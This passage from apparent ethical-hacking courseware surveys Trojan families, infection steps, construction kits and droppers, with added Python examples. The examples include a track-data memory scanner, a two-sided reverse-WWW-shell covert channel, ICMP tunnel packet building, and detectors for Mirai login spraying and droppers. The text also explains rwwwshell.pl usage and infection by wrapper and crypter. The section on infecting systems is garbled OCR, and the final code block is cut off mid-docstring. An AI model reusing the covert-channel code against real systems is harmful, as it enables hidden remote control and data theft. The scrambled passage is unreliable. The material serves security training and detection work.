Figure 7.8: Screenshot showing start of EquationDrug Rootkit
Some additional rootkit Trojans are as follows:
* cEIDPageLock
* Wingbird
* GrayFish
* Finfisher
* ZeroAccess
* Whistler
E-banking Trojans
E-banking Trojans are extremely dangerous and have emerged as a significant threat to online banking. They intercept the victim's account information inside the browser, before the system can encrypt it for transmission, and send it to the attacker's command-and-control center. Installation of these Trojans takes place on the victim's computer when he or she clicks a malicious email attachment or a malicious advertisement. Attackers program these Trojans to steal amounts between a configured minimum and maximum, so that they do not withdraw all the money in the account, thereby avoiding suspicion. These Trojans also create screenshots of the bank account statement, so that the victim thinks that there is no variation in his/her bank balance and is not aware of this fraud unless he/she checks the balance from another system or an ATM. These Trojans may also steal victims' data such as credit card numbers and billing details, and transmit them to remote hackers via email, FTP, IRC, or other methods.
Figure 7.9: Working of Banking Trojan
Working of E-banking Trojans
Banking Trojans steal information about users' online banking and payment systems. The working of a banking Trojan includes the following:
* TAN Grabber: A Transaction Authentication Number (TAN) is a single-use password for authenticating online banking transactions. Banking Trojans intercept valid TANs entered by users and replace them with random numbers. The bank will reject such invalid random numbers. Subsequently, the attacker misuses the intercepted TAN with the target's login details.
* HTML Injection: The Trojan creates fake form fields on e-banking pages, thereby enabling the attacker to collect the target's account details, credit card number, date of birth, etc. The attacker can use this information to impersonate the target and compromise his/her account.
Some methods used by banking Trojans to steal users' information are as follows:
* Keylogging
* Form data capture
* Inserting fraudulent form fields
* Screen captures and video recording
* Mimicking financial websites
* Redirecting to banking websites
* Man-in-the-middle attack
E-banking Trojan: Dreambot
Dreambot banking Trojans are also known as updated versions of Ursnif or Gozi. Dreambot Trojans have long been used by hackers, and they have been regularly updated with more sophisticated capabilities. They can be delivered through the Emotet dropper or the RIG exploit kit. This Trojan can also be embedded as a macro in an MS Word document and sent to victims via spam emails. If this Trojan gets into the victim's machine, it will covertly create registry keys and processes, and attempt to connect to multiple malicious command-and-control (C&C) servers.
Figure 7.10: HTTPS requests to malicious servers
After connecting to the C&C server, it will perform keylogging and send the keylog data to the attacker. This keylog data can include passwords of banking websites, OTP messages, secure transaction passwords, PINs, etc.
Figure 7.11: Screenshot of Dreambot Banking Trojan keylog data
Some additional e-banking Trojans are as follows:
* Emotet
* PandaBanker
* Ramnit
* Zeus
* Dridex
* UrizoneBanker
Point-of-Sale Trojans
As the name indicates, point-of-sale (POS) Trojans are a type of financial fraud malware that target POS and payment equipment such as credit card/debit card readers. Attackers use POS Trojans to compromise such POS equipment and grab sensitive information regarding credit cards, such as the credit card number, holder name, and the card verification value encoded on the stripe (which differs from the CVV2 printed on the card). Since POS plays a critical role in the retail industry, these Trojans have a great impact on retail businesses and retail customers. The magnetic stripe on a credit card consists of two tracks, namely TRACK1 and TRACK2. These are critical for completing the transaction using a POS device. Track 1 and Track 2 comprise critical information related to the credit card. Once a POS Trojan affects and compromises a POS device, it attempts to grab the TRACK1 and TRACK2 information of the card that is swiped in the device. The data is readable because it sits in clear text in the memory of the payment application between the swipe and encryption; point-to-point encryption in the reader itself removes this window. Once the attacker acquires this information, he/she has enough to clone the card and can easily perform financial fraud.
GlitchPOS
It is popularly known as GlitchPOS.A. GlitchPOS is a Trojan that masquerades as a cat game. The fake cat game is embedded in the malware and displayed at the time of execution. When any victim installs the cat game, the Trojan is executed in the background. GlitchPOS is used by attackers to grab the credit card information of the victim. GlitchPOS has become one of the most notorious financial Trojans, and its adverse effects have spread across the globe. To steal the credit card information, this Trojan searches for the Track 1 and Track 2 details in the memory pages of devices.
Figure 7.12: Screenshot of GlitchPOS Trojan
Some additional POS Trojans are as follows:
* LockPOS
* BlackPOS
* FastPOS
* PunkeyPOS
* CenterPOS
* MalumPOS
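The memory search that GlitchPOS and the other RAM scrapers above perform is the same search a forensic analyst or DLP tool runs over a process memory dump to find exposed track data. The following is an added example, not code from the courseware or from any of the malware families named: it scans a buffer for Track 1 and Track 2 patterns and keeps only candidates whose primary account number passes the Luhn check. The sample dump, the test card number, and the format tolerances in the regular expressions are assumptions constructed for the demonstration.

```python
"""Scan a memory buffer for magnetic-stripe Track 1 / Track 2 data.

Added example, not from the courseware. SAMPLE_DUMP is constructed; the PAN
used is the conventional 4111... test number. Real findings must be masked
before they are logged or reported (PCI DSS), which mask_pan() does.
"""
import re
from typing import List

# Track 1, format B: %B<PAN>^<NAME>^<YYMM><service code><discretionary data>?
TRACK1_RE = re.compile(rb"%B(\d{13,19})\^([A-Z0-9 /.\-]{2,26})\^(\d{4})(\d{3})([^?]{0,40})\?")
# Track 2: ;<PAN>=<YYMM><service code><discretionary data>?
TRACK2_RE = re.compile(rb";(\d{13,19})=(\d{4})(\d{3})([^?]{0,30})\?")


def luhn_ok(pan: str) -> bool:
    """Mod-10 check that every real PAN satisfies; cuts most random digit runs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        digit = int(ch)
        if i % 2 == 1:
            digit *= 2
            if digit > 9:
                digit -= 9
        total += digit
    return total % 10 == 0


def mask_pan(pan: str) -> str:
    """Keep the first six (issuer) and last four digits, as PCI DSS permits."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_track_data(buf: bytes) -> List[dict]:
    """Return masked findings for every Luhn-valid Track 1 / Track 2 record in buf."""
    hits = []
    for m in TRACK1_RE.finditer(buf):
        pan = m.group(1).decode("ascii")
        if luhn_ok(pan):
            hits.append({"track": 1, "pan": mask_pan(pan), "offset": m.start(),
                         "name": m.group(2).decode("ascii").strip(),
                         "expiry": m.group(3).decode("ascii")})
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode("ascii")
        if luhn_ok(pan):
            hits.append({"track": 2, "pan": mask_pan(pan), "offset": m.start(),
                         "expiry": m.group(2).decode("ascii")})
    return sorted(hits, key=lambda h: h["offset"])


# Constructed sample: fragments of a payment application's heap with one card
# swipe (both tracks) and a Luhn-invalid digit run that must not be reported.
SAMPLE_DUMP = (
    b"\x00\x00POSApp.exe\x00heap\x00" * 3
    + b"%B4111111111111111^DOE/JOHN^25121011234567890?"
    + b"\x00" * 16
    + b";4111111111111111=25121011234567890?"
    + b"\x00ignored:;1234567890123456=2512101?"
    + b"\x00" * 8
)

if __name__ == "__main__":
    for hit in find_track_data(SAMPLE_DUMP):
        print(hit)
```

Scanning a dump taken from the payment process is also a quick way to confirm whether a reader is doing point-to-point encryption: if track data is findable in the application's memory at all, a scraper on that host will find it too.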
Defacement Trojans
Defacement Trojans, once spread over the system, can destroy or change the entire content of a database. However, they are more dangerous when attackers target websites, as they physically change the underlying HTML format, resulting in the modification of content. In addition, significant losses may be incurred due to the defacement of e-business targets by Trojans.
Resource editors allow one to view, edit, extract, and replace bitmaps, strings, logos, and icons from any Windows program. They allow viewing and editing of nearly any aspect of a compiled Windows program, from menus to dialog boxes and icons, etc. They employ user-styled custom applications (UCAs) to deface Windows applications. Because editing resources alters the binary, a resource-patched copy of a signed program no longer passes Authenticode signature verification, which is the simplest check for this kind of tampering.
Figure 7.13: Screenshot showing a defaced application (original calc.exe and defaced calc.exe)
Restorator
Source: http://www.bome.com
Restorator is a utility for editing Windows resources in applications and their components (e.g., files with .exe, .dll, .res, .rc, and .dcr extensions). It allows you to add, change, or remove resources such as text, images, icons, sounds, videos, versions, dialogs, and menus in nearly all programs. Using this tool, one can achieve translation/localization, customization, design improvement, and development.
Features:
* Translate existing applications (localization)
* Customize the look and feel of programs
* Replace logos and icons (branding)
* Enhance control over resource files in the software development process
* Hack into the inner workings of applications on the computer
Figure 7.14: Screenshot showing Restorator
Service Protocol Trojans
These Trojans can take advantage of vulnerable service protocols such as VNC, HTTP/HTTPS, and ICMP, to attack the victim's machine.
VNC Trojans
A VNC Trojan starts a VNC server daemon in the infected system (victim), whereby the attacker connects to the victim using any VNC viewer. Since the VNC program is considered a utility, this Trojan is difficult to detect using antivirus software. Well-known financial malware such as Dridex, Neverquest, and Gozi employ a hidden virtual network computing (HVNC) module, which allows attackers to gain user-grade access to an infected PC.
Figure 7.15: Working of VNC Trojan
HTTP/HTTPS Trojans
HTTP/HTTPS Trojans can bypass firewalls that allow outbound web traffic, because they work in reverse, as opposed to a straight HTTP tunnel. They use web-based interfaces and port 80. The execution of these Trojans takes place on the internal host and spawns a child program at a predetermined time. The child program appears as a user to the firewall; hence, the firewall allows the program to access the Internet. However, this child program executes a local shell, connects to the web server that the attacker owns on the Internet through an apparently legitimate HTTP request, and sends it a ready signal. The apparently legitimate answer from the attacker's web server is, in fact, a series of commands that the child can execute on the machine's local shell. The attacker converts all the traffic into a Base64-like structure and gives it as a value for a cgi-string to avoid detection.
The following is an example of a connection:
Slave: GET /cgi-bin/order?MSmAe}TgZdgYOdgIO0BqFFVYTg}FLdgxEdbive7kr} HTTP/1.0
Master replies with: g5mAlfbknz
The GET of the internal host (SLAVE) is the command prompt of the shell; the answer is an encoded "ls" command from the attacker on the external server (MASTER). The SLAVE tries to connect to the MASTER daily at a specified time. If necessary, the child is spawned if the shell hangs; the attacker can check and fix it the next day. If the administrator sees connections to the attacker's server and connects to that server himself/herself, he/she just sees a broken web server, because there is a token (password) in the encoded cgi GET request. Support for WWW proxies (e.g., Squid, a fully featured web proxy cache) is available. The program masks its name in the process listing. The programs are reasonably small; the master and slave programs consist of only 260 lines per file. Usage is easy: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and run "rwwwshell.pl" on the MASTER just before the slave tries to connect.
Figure 7.16: Working of HTTP Trojan
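The exchange described above, as an added example that is not code from the courseware and does not reproduce the rwwwshell.pl wire format: both sides of the covert channel are simulated in one process (no network is used), together with the kind of proxy-log heuristic a defender can apply to it. The shared token, the XOR masking, and the /cgi-bin/order path are assumptions that imitate the "Base64-like value in a cgi-string" the text describes.

```python
"""Reverse-WWW-shell style exchange and a proxy-log heuristic for spotting it.

Added example, not from the courseware and not the rwwwshell.pl wire format:
the token, the XOR masking and the /cgi-bin/order path are assumptions that
imitate the 'Base64-like value in a cgi-string' described in the text.
"""
import base64
import math
import re
from collections import Counter
from typing import Optional, Tuple

TOKEN = b"s3cret-token"        # assumed shared secret; a request without it gets an error page
PATH = "/cgi-bin/order"


def _mask(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR: obfuscation only, not encryption (as in the original tool)."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def encode_param(plaintext: bytes) -> str:
    """token + masked payload, base64 (URL-safe, padding stripped) so it fits a query string."""
    raw = TOKEN + _mask(plaintext, TOKEN)
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def decode_param(value: str) -> Optional[bytes]:
    """Return the payload, or None when the token is missing (what a probing admin gets)."""
    try:
        raw = base64.urlsafe_b64decode(value + "=" * (-len(value) % 4))
    except ValueError:
        return None
    if not raw.startswith(TOKEN):
        return None
    return _mask(raw[len(TOKEN):], TOKEN)


def slave_request(shell_output: bytes) -> str:
    """Internal host: ship the shell prompt/output out as an innocent-looking GET."""
    return f"GET {PATH}?{encode_param(shell_output)} HTTP/1.0"


def master_reply(request_line: str, next_command: bytes) -> Tuple[Optional[bytes], str]:
    """Attacker's web server: validate the token, recover the output, answer with a command."""
    m = re.match(rf"GET {re.escape(PATH)}\?(\S+) HTTP/1\.0$", request_line)
    if not m:
        return None, "HTTP/1.0 404 Not Found\r\n\r\n"
    output = decode_param(m.group(1))
    if output is None:
        return None, "HTTP/1.0 500 Internal Server Error\r\n\r\n"   # looks like a broken server
    return output, "HTTP/1.0 200 OK\r\n\r\n" + encode_param(next_command)


def slave_handle_reply(reply: str) -> Optional[bytes]:
    """Internal host: the 'page' body is the next command for the local shell."""
    status, _, body = reply.partition("\r\n\r\n")
    return decode_param(body) if status.startswith("HTTP/1.0 200") else None


def shannon_entropy(s: str) -> float:
    counts = Counter(s)
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def looks_like_tunnel(request_line: str, min_len: int = 24, min_entropy: float = 3.5) -> bool:
    """Proxy-log heuristic: one long, high-entropy bare query value (no key=value pairs).
    Padding the payload with repeated bytes would lower its entropy and evade this check."""
    m = re.match(r"GET \S+\?([^&\s]+) HTTP", request_line)
    if not m:
        return False
    value = m.group(1)
    return len(value) >= min_len and "=" not in value and shannon_entropy(value) >= min_entropy


if __name__ == "__main__":
    req = slave_request(b"sh-4.4$ ")                # slave reports its prompt
    output, reply = master_reply(req, b"ls")         # master answers with 'ls'
    print(req, "->", reply.splitlines()[-1], "=", slave_handle_reply(reply))
    print("flagged:", looks_like_tunnel(req))
```

The heuristic is deliberately cheap, which is also its weakness: an operator who pads the encoded value with repeated characters drops its entropy below the threshold. The more durable signal in the description above is the schedule, since the slave connects to the same host at the same time every day, and that periodicity survives any re-encoding.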
SHTTPD
SHTTPD is a small HTTP server that can be embedded inside any program. It can be wrapped with a genuine program (e.g., the game chess.exe). When executed, it will turn a computer into an invisible web server. For instance, an attacker infects the victim's computer with chess.exe, with Shttpd running in the background and listening on port 443 (SSL), and then connects to the victim using a web browser at http://10.0.0.5:443.
Figure 7.17: SHTTPD attack process (the firewall normally allows port 443 through, so the attacker reaches the victim at 10.0.0.5:443)
HTTP RAT
HTTP RAT uses web interfaces and port 80 to gain access. It can be understood simply as an HTTP tunnel, except that it works in the reverse direction. These Trojans are comparatively more dangerous, as they work nearly ubiquitously wherever the Internet can be accessed.
Features:
* Displays ads and records personal data/keystrokes
* Downloads unsolicited files and disables programs/system
* Floods the Internet connection and distributes threats
* Tracks browsing activities and hijacks the Internet browser
* Makes fraudulent claims about spyware detection and removal
Figure 7.18: Working of HTTP RAT Trojan
ICMP Trojans
An attacker can hide data using covert channel methods in a protocol in a way that is hard to detect. The concept of ICMP tunneling allows one protocol to be carried over another protocol. ICMP tunneling uses ICMP echo request and reply to carry a payload and stealthily access or control the victim's machine. Attackers can use the data portion of ICMP_ECHO and ICMP_ECHOREPLY packets for arbitrary information tunneling. Many network layer devices and proxy-based firewalls do not filter or inspect the contents of ICMP_ECHO traffic, making the use of this channel attractive to hackers. Such devices simply pass, drop, or return the ICMP packets. The Trojan packets themselves masquerade as common ICMP_ECHO traffic. The packets can encapsulate (tunnel) any required information.
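The mechanism above in working code, as an added example that is not from the courseware: a tunnel side that splits data across the data portion of consecutive echo requests, a receiving side that reassembles them by sequence number, and the detection angle, which rests on RFC 792's requirement that an echo reply carry back exactly the data of its request. The session identifier, chunk size, and the list of "usual" payload sizes are assumptions made for the demonstration; packets are built and parsed in memory, so no raw socket is needed.

```python
"""ICMP echo tunnelling: packet construction, reassembly, and a reply-mirror check.

Added example, not from the courseware. Packets are built in memory only; the
ident value, the chunk size and the 'usual' ping payload sizes are assumptions.
"""
import struct
from typing import List, Tuple

ECHO_REQUEST, ECHO_REPLY = 8, 0


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 one's-complement sum; yields 0 for a packet whose checksum field is correct."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo(payload: bytes, ident: int, seq: int, reply: bool = False) -> bytes:
    """type, code, checksum, identifier, sequence number, then the data portion."""
    icmp_type = ECHO_REPLY if reply else ECHO_REQUEST
    header = struct.pack("!BBHHH", icmp_type, 0, 0, ident, seq)
    csum = icmp_checksum(header + payload)
    return struct.pack("!BBHHH", icmp_type, 0, csum, ident, seq) + payload


def parse_echo(packet: bytes) -> dict:
    icmp_type, code, _, ident, seq = struct.unpack("!BBHHH", packet[:8])
    return {"type": icmp_type, "code": code, "ident": ident, "seq": seq,
            "payload": packet[8:], "checksum_ok": icmp_checksum(packet) == 0}


def tunnel_send(data: bytes, ident: int, chunk: int = 32) -> List[bytes]:
    """Tunnel side: spread data over consecutive echo requests; seq orders the chunks."""
    return [build_echo(data[i:i + chunk], ident, seq)
            for seq, i in enumerate(range(0, len(data), chunk), start=1)]


def tunnel_receive(packets: List[bytes], ident: int) -> bytes:
    """Far side: reassemble one session's chunks in seq order, dropping corrupt packets."""
    chunks = {}
    for p in (parse_echo(pkt) for pkt in packets):
        if p["type"] == ECHO_REQUEST and p["ident"] == ident and p["checksum_ok"]:
            chunks[p["seq"]] = p["payload"]
    return b"".join(chunks[s] for s in sorted(chunks))


def normal_echo_reply(request: bytes) -> bytes:
    """What an unmodified IP stack does (RFC 792): mirror ident, seq and payload back."""
    p = parse_echo(request)
    return build_echo(p["payload"], p["ident"], p["seq"], reply=True)


def suspicious_pairs(requests: List[bytes], replies: List[bytes],
                     usual_sizes: Tuple[int, ...] = (0, 32, 56)) -> List[tuple]:
    """Detection: a reply whose payload does not mirror its request (the tunnel master
    answering with a command), or a payload size no common ping client uses."""
    by_key = {(parse_echo(r)["ident"], parse_echo(r)["seq"]): r for r in requests}
    findings = []
    for rep in replies:
        q = parse_echo(rep)
        req = by_key.get((q["ident"], q["seq"]))
        reasons = []
        if req is not None and parse_echo(req)["payload"] != q["payload"]:
            reasons.append("reply payload differs from request")
        if len(q["payload"]) not in usual_sizes:
            reasons.append("unusual payload size %d" % len(q["payload"]))
        if reasons:
            findings.append((q["ident"], q["seq"], reasons))
    return findings


if __name__ == "__main__":
    pkts = tunnel_send(b"uid=0(root) gid=0(root) groups=0(root)\n", ident=0xBEEF, chunk=16)
    print(len(pkts), "echo requests carry:", tunnel_receive(pkts, 0xBEEF))
    covert_reply = build_echo(b"ls -la\n", 0xBEEF, 1, reply=True)
    print(suspicious_pairs([pkts[0]], [covert_reply]))
```

Two caveats for anyone turning this into a detection rule: a tunnel that rides only echo requests to a host the attacker controls (and lets that host's stack answer normally) never produces a mismatched reply, so the size and volume checks have to carry the load there; and the "usual sizes" list has to be learned from the local environment, since monitoring tools send pings of their own.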
Figure 7.19: Working of ICMP Trojan
Mobile Trojans
Mobile Trojans are malicious software that target mobile phones. Mobile Trojan attacks are increasing rapidly due to the global proliferation of mobile phones. The attacker tricks the victim into installing the malicious application. When the victim downloads the malicious app, the Trojan performs various attacks such as banking credential stealing, social networking credential stealing, data encryption, and device locking.
BasBanke
BasBanke is a Trojan family that runs on Android. The Trojan was first identified in 2018 during the Brazilian elections, registering over 10,000 installations as of April 2019 from the official Google Play Store alone. It is a banking Trojan, and when it infects a device, it performs keystroke logging, screen recording, SMS interception, and theft of credit card and financial information. To trick users into downloading this Trojan, the Trojan creators advertised it via WhatsApp and Facebook messages. The most widely spread and downloaded malicious version of BasBanke is the fake CleanDroid Android app. CleanDroid projects itself as a mobile junk cleaning and memory boosting app; however, it is actually a banking Trojan.
Figure 7.20: Screenshot of BasBanke Mobile Trojan
Some additional mobile Trojans are as follows:
* Agent Smith
* Hiddad
* AndroRAT
* Rotexy
* GPlayed
* Asacub
* Gustuff
IoT Trojans
Internet of things (IoT) refers to the inter-networking of physical devices, buildings, and other items embedded with electronics. IoT Trojans are malicious programs that attack IoT networks. These Trojans leverage a botnet to attack other machines outside the IoT network.
Mirai
Mirai is a self-propagating IoT botnet that infects poorly protected Internet devices (IoT devices). Mirai uses the telnet ports (23 or 2323) to find those devices that are still using their factory default username and password. Many IoT devices ship with, and keep, default usernames and passwords. Mirai can infect such insecure devices (bots) and co-ordinate them to mount a DDoS attack against a chosen victim.
Features:
* Login attempts with 60 different factory default username and password pairs
* Built for multiple CPU architectures (x86, ARM, SPARC, PowerPC, Motorola)
* Connects to C&C to allow the attacker to specify an attack vector
* Increases bandwidth usage for infected bots
* Identifies and removes competing malware
* Blocks remote administration ports
Figure 7.21: Screenshot displaying Mirai DDoS attack
Some additional IoT botnet Trojans are as follows:
* Silex
* BrickerBot
* Satori
* Torii botnet
* Miori IoT Botnet
* Bashlite IoT Malware
* Gafgyt Botnet
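Mirai's scanner announces itself in a device's login log: one source tries a fixed list of default username and password pairs against telnet in quick succession, cycling through several usernames. The following is an added example, not code from the courseware or from Mirai, that detects that pattern over constructed telnet login records and notes whether a success followed the burst. The log line format, the usernames, the window length, and the thresholds are all assumptions; adapt LOG_RE to what your telnetd or syslog actually emits.

```python
"""Spot Mirai-style default-credential spraying in telnet login logs.

Added example, not from the courseware. The log format and the LOG_LINES
sample are constructed; adapt LOG_RE to whatever your telnetd/syslog emits.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import List

LOG_RE = re.compile(
    r"^(?P<ts>\S+) telnetd\[\d+\]: login (?P<result>failed|succeeded) "
    r"user='(?P<user>[^']*)' from (?P<src>[0-9.]+)$"
)


def parse_log(lines: List[str]) -> List[dict]:
    """Turn matching lines into events; lines in another format are ignored."""
    events = []
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]), "result": m["result"],
                           "user": m["user"], "src": m["src"]})
    return events


def detect_credential_spray(events: List[dict], window: timedelta = timedelta(seconds=60),
                            min_attempts: int = 6, min_users: int = 3) -> List[dict]:
    """Per source, slide a window over failed logins and alert on the largest burst that
    also cycles through several usernames (Mirai walks a fixed list of default pairs, so
    one source tries root, admin, support, ... within seconds). A success from the same
    source after the burst marks the device as compromised, not merely probed."""
    by_src = defaultdict(list)
    for e in events:
        by_src[e["src"]].append(e)
    alerts = []
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        fails = [e for e in evs if e["result"] == "failed"]
        best, start = None, 0
        for end in range(len(fails)):
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1
            burst = fails[start:end + 1]
            users = {e["user"] for e in burst}
            if len(burst) >= min_attempts and len(users) >= min_users:
                if best is None or len(burst) > len(best):
                    best = burst
        if best:
            last = best[-1]["ts"]
            compromised = any(e["result"] == "succeeded" and e["ts"] >= last for e in evs)
            alerts.append({"src": src, "attempts": len(best), "first": best[0]["ts"],
                           "users": sorted({e["user"] for e in best}),
                           "compromised": compromised})
    return alerts


# Constructed sample: one Mirai-like scanner and one admin who mistyped a password twice.
LOG_LINES = [
    "2020-05-01T10:00:00 telnetd[211]: login failed user='root' from 198.51.100.23",
    "2020-05-01T10:00:02 telnetd[211]: login failed user='root' from 198.51.100.23",
    "2020-05-01T10:00:03 telnetd[211]: login failed user='admin' from 198.51.100.23",
    "2020-05-01T10:00:05 telnetd[211]: login failed user='support' from 198.51.100.23",
    "2020-05-01T10:00:06 telnetd[211]: login failed user='user' from 198.51.100.23",
    "2020-05-01T10:00:08 telnetd[211]: login failed user='root' from 198.51.100.23",
    "2020-05-01T10:00:09 telnetd[211]: login failed user='admin' from 198.51.100.23",
    "2020-05-01T10:00:11 telnetd[211]: login failed user='guest' from 198.51.100.23",
    "2020-05-01T10:00:12 telnetd[211]: login succeeded user='admin' from 198.51.100.23",
    "2020-05-01T10:30:00 telnetd[211]: login failed user='admin' from 10.0.0.8",
    "2020-05-01T10:30:07 telnetd[211]: login failed user='admin' from 10.0.0.8",
    "2020-05-01T10:30:15 telnetd[211]: login succeeded user='admin' from 10.0.0.8",
]

if __name__ == "__main__":
    for alert in detect_credential_spray(parse_log(LOG_LINES)):
        print(alert)
```

Because Mirai closes the telnet port on a bot once it owns it (the "blocks remote administration ports" feature above), a device that stops logging telnet sessions at all shortly after such a burst is a second signal worth correlating with the first.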
Security Software Disabler Trojans
Security software disabler Trojans stop the working of security programs such as firewalls and IDS, either by disabling them or by killing their processes. These are entry Trojans, which allow an attacker to perform the next level of attack on the target system. Some security software disabler Trojans are as follows:
* Certlock
* GhostHook
* Trojan.Disabler
Destructive Trojans
The sole purpose of a destructive Trojan is to delete files on a target system. Antivirus software may not detect destructive Trojans. Once a destructive Trojan infects a computer system, it randomly deletes files, folders, and registry entries as well as local and network drives, often resulting in OS failure.
DDoS Attack Trojans
... command-and-control (C&C) server from which it downloads a configuration file containing a range of IP addresses to attempt authentication over several ports. Along with the infected botnet zombies, it performs DDoS attacks in which a zombie floods a target server/machine with malicious traffic.
Command Shell Trojans
A command shell Trojan provides remote control of a command shell on a victim's machine. A Trojan server is installed on the victim's machine, which opens a port, allowing the attacker to connect. The client is installed on the attacker's machine, which is used to launch a command shell on the victim's machine. Netcat, DNSMessenger, and GCat are some of the latest command shell Trojans. Netcat is a general-purpose networking utility that attackers repurpose as a bind or reverse shell, while DNSMessenger and GCat carry their shell traffic over DNS and over Gmail respectively, so the port they use is one that is already allowed.
Figure 7.22: Working of Command Shell Trojan
How to Infect Systems Using a Trojan
attacker remotely
‘An can controlthe system hardwareandsoftwarebyinstalling
a Trojanon.
the system. OncetheTrojan is installed thedatabecome
o n the system, vulnerable
to threats.
In addition,
the attackerc an perform attackson third-party
systems.
AttackersdeliverTrojans i n manyways to infecttarget systems:
Trojans are includedi n bundledsharewareor downloadablesoftware.Whenusers
downloadsuchfiles,the targetsystems
automatically
installthe Trojans.
Differentpop-up
regardless ads try to trick users. They
are programmed
ofwhetheru sers clickYESor NO,a download
will begin
bythe attackersuchthat
will
andthe Trojan
‘automatically
on
installitself the system.
Attackerssendthe Trojansas emailattachments.Whenusers open thesemalicious
attachments,
the Trojans
are automatically
installed.
Usersa re sometimestemptedto clickon differenttypesof files,suchas greeting cards,
porn videos,andimages,whichmight Clicking
contain Trojans. on thesefilesinstallsthe
Trojans,
Attackersinfecta targetmachineusing a Trojan
i n the following
steps:
=
Step1: Create a new Trojanpacket using various tools such as TrojanHorse
Construction Toolkit(SET),
kit,SocialEngineering andBeast.NewTrojans havea higher
chanceof succeeding the target
i n compromising system, as the securitymechanisms
mightfail to detectthem.TheseTrojans can be transferred to thevictim'smachine
using
dropper
a or downloader.
ical andCountermensores
Mackin ©by E-Comel
Copyright
Step 2: Employ a dropper or a downloader to install the malicious code on the target system. The dropper appears to users as a legitimate application or a well-known and trusted file. However, when it is run, it extracts the malware components hidden in it and executes them, usually without saving them to the disk, to avoid detection. Droppers include decoy images, games, or benign messages in their packages, to divert users' attention from malicious activities. Downloaders are malware transporters that do not contain the actual malware file; however, they contain the link from where the actual Trojan can be downloaded. When a downloader is executed on the target machine, it connects back to the attacker's server and downloads the intended Trojan on the victim's machine. Droppers can easily evade firewalls; however, a downloader can be detected with the help of network analyzer tools.
Step 3: Employ a wrapper such as petite.exe, Graffiti.exe, IExpress Wizard, or EliteWrap to help bind the Trojan executable to legitimate files to install it on the target system.
Step 4: Employ a crypter such as BitCrypter to encrypt the Trojan to evade detection by firewalls/IDS.
Step 5: Propagate the Trojan by implementing various methods such as sending it via overt and covert channels, exploit kits, emails, and instant messengers, thereby tricking users into downloading and executing it. An active Trojan can perform malicious activities such as irritating users with constant pop-ups, changing desktops, changing or deleting files, stealing data, and creating backdoors.
Step 6: Deploy the Trojan on the victim's machine by executing the dropper or downloader software to disguise it. The deployed file contains wrapped and encrypted malware.
Step 7: Execute the damage routine. Most malware contain a damage routine that delivers payloads. Some payloads just display images or messages, whereas others can even delete files, reformat hard drives, or cause other damage. The damage routine can also include malware beaconing.
Figure 7.23: Diagram showing the complete process involved in infecting a target machine using a Trojan
Creating a Trojan
Attackers can create Trojans using various Trojan horse construction kits such as DarkHorse Trojan Virus Maker and Senna Spy Trojan Generator.
Trojan Horse Construction Kit
Trojan horse construction kits help attackers construct Trojan horses and customize them according to their needs. These tools are dangerous and can backfire if not properly executed. New Trojans created by attackers remain undetected when scanned by virus- or Trojan-scanning tools, as they do not match any known signatures. This added benefit allows attackers to succeed in launching attacks.
DarkHorse Trojan Virus Maker
DarkHorse Trojan Virus Maker is used to create user-specified Trojans via selection from a variety of available options. The Trojans are created to act according to these selected options. For example, if you choose the option Disable Process, the Trojan disables all processes on the target system. The figure below shows a snapshot of DarkHorse Trojan Virus Maker with its various available options.
Figure 7.2: Screenshot of DarkHorse Trojan Virus Maker
Some additional Trojan horse construction kits are as follows:
- Trojan Horse Construction Kit
- Senna Spy Trojan Generator
- Batch Trojan Generator
- Umbra Loader Botnet Trojan Maker
Employing a Dropper or Downloader
After constructing their intended Trojans, attackers can employ a dropper or a downloader to transmit the Trojan package to the victim's machine.
Droppers
Droppers are malware programs that are used to camouflage payloads that can impede the functioning of the target system. The dropper consists of one or more types of malware features that can make it undetectable by antivirus software; moreover, the installation process can be stealthily performed.
The dropper is executed by simply loading its own code into the memory, and the malware payload is then extracted and written into the file system. Next, the malware installation process is initiated, and the payload is executed.
Emotet and Dridex are well-known droppers that attackers employ for deploying malware on the target machine.
Downloaders
A downloader is a program that can download and install harmful programs such as malware. Downloaders are similar to droppers to a certain extent. However, the main difference is that a downloader does not carry malware itself, whereas a dropper does; hence, it is possible for a new unknown downloader to pass through the anti-malware scanner. Attackers use downloaders as part of the payload or other harmful programs that can drop and stealthily install the malware. Downloaders are spread as camouflaged files attached in emails, and the attached programs pose as legitimate programs such as accounts.exe or invoices.
When the victim opens the attached infected file, the downloader tries to contact the remote server for directly fetching other malicious programs. Godzilla downloader, W97M.Downloader!gen36, Trojan.Downloader, and JS.Downloader!gen277 are some well-known downloaders that attackers employ for deploying malware on the target machine.
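Both behaviours described above (a dropper that extracts and writes its payload to disk and then runs it, and a downloader that first contacts a remote server) can be spotted on the endpoint by correlating file-write and process-start telemetry. The following detection logic is an added example, not the courseware's code; the Sysmon-style event records, paths and addresses are constructed.

```python
"""
Correlate host telemetry to catch the dropper/downloader pattern described
above: a process writes an executable to disk and then launches it (dropper),
or does the same right after talking to a remote host (downloader).
Events are constructed Sysmon-style records (IDs 1, 3 and 11), not real logs.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

EXECUTABLE_EXTS = (".exe", ".dll", ".scr", ".com", ".bat", ".vbs", ".js")


@dataclass
class Finding:
    kind: str         # "dropper" or "downloader"
    writer_pid: int   # process that wrote the executable
    path: str         # executable that was written and then launched
    remote: str       # endpoint contacted before the write ("" for a dropper)


def is_executable(path: str) -> bool:
    return path.lower().endswith(EXECUTABLE_EXTS)


def correlate(events: List[Dict]) -> List[Finding]:
    """Walk events in time order and tie each write of an executable to a later
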